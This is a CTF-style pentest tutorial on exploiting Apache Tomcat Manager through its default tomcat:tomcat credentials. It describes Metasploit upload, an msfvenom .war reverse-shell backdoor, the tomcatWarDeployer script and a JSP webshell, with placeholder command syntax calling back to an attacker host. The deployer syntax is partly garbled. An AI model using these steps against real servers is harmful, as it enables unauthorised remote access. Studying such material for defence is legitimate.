Multiple Ways to Exploit Tomcat Manager

Hello Friends, today through this article I would like to share my experience “how to exploit Tomcat Manger Application” if you have default login credential (tomcat: tomcat).  While playing CTF, many times I found Apache Tomcat is running in target machine that have configured with default login and this can help us to get remote machine shell. Therefore I feel, I should write all possible ways to exploit tomcat manger application to gaining webshell of remote machine.

Table of Content

  • Tomcat Manager Authenticated Upload Code Execution
  • Generate .war Format Backdoor
  • Tomcat War Deployer Script
  • Generate a JSP Webshell

Let’s start with nmap scan and to tomcat service check port 8080 as tomcat.

From nmap output result, we found port 8080 is open for Apache Tomcat. So we navigate to web browser and on exploring Target IP: port we saw HTTP authentication page to login in tomcat manger application.

Tomcat Manager Authenticated Upload Code Execution

This module can be used to execute a payload on Apache Tomcat servers that have an exposed “manager” application. The payload is uploaded as a WAR archive containing a jsp application using a POST request against the /manager/html/upload component. NOTE: The compatible payload sets vary based on the selected target. For example, you must select the Windows target to use native Windows payloads.

As result you can observe that, we have meterpreter session of the target machine.

Generate .war Format Backdoor

We can use msfvenom for generating a .war format backdoor for java/jsp payload, all you need to do is just follow the given below syntax to create .war format file and then run netcat listener.

Syntax: msfvenom -p [payload] LHOST=[Kali Linux IP] LPORT=[1234] -f [file format] > [file name]

 

Now login to tomcat manager application using tomcat: tomcat as username: password. You will be welcomed by admin dashboard where you can upload a .war file. 

As you can observe I had browser the malicious shell.war file to be deploy as highlighted in the image. As soon as you will upload your file, you will saw the /path entry for your file in the table of Applications

To execute your .war file, you have to click on the /.war file path mention in the Application table. Or you can directly explore http://target_IP:port/file_name.

As soon as you will execute your file you will get reverse connection through netcat.

Booom!!! One more time we have access remote webshell.

Tomcat War Deployer Script

This is a penetration testing tool intended to leverage Apache Tomcat credentials in order to automatically generate and deploy JSP Backdoor, as well as invoke it afterwards and provide nice shell (either via web gui, listening port binded on remote machine or as a reverse tcp payload connecting back to the adversary).

In practice, it generates JSP backdoor WAR package on-the-fly and deploys it at the Apache Tomcat Manager Application, using valid HTTP Authentication credentials that pentester provided (or custom ones, in the end, we all love tomcat:tomcat ).

You can download it from here: https://github.com/mgeeky/tomcatWarDeployer

Now follow the syntax to exploit the target machine without uploading .war file manually.

Syntax : ./tomcatWarDeployer.py -U [usrename] -p [password]-H [Kali Linux IP]-p [Listening port] [target_IP]:[tomcat_port]

On executing above command, I got webshell directly as you can observe it in the given below image.

Generate a JSP Webshell

In this part, we are going to see how we can generate and deploy a Webshell to gain command execution on the Tomcat manger application.

First, we will need to write the Webshell and package it as a .war file format. To write the jsp Webshell, we are using the following code which I found from from this Link: https://pentesterlab.com/exercises/cve-2007-1860/course

Save the code as index.jsp and then execute following command to package it as .war file.

With the help of above command you will get a war file, which you can deploy in tomcat manger application.

As you can observe from the given below image, I had deployed my webshell.war file which successfully uploaded, now let’s click on this file for its execution.

On executing /webshell you will get a HTTP 404 error, now execute index.jsp file in the as given below:

On executing above URL you will get command execution form, now use it wisely to cmd commands.

Hopefully! You have enjoyed this article how to get access to the Tomcat manager using CVE-2007-1860.

Author: AArti Singh is a Researcher and Technical Writer at Hacking Articles an Information Security Consultant Social Media Lover and Gadgets. Contact here

Leave a Reply

Your email address will not be published. Required fields are marked *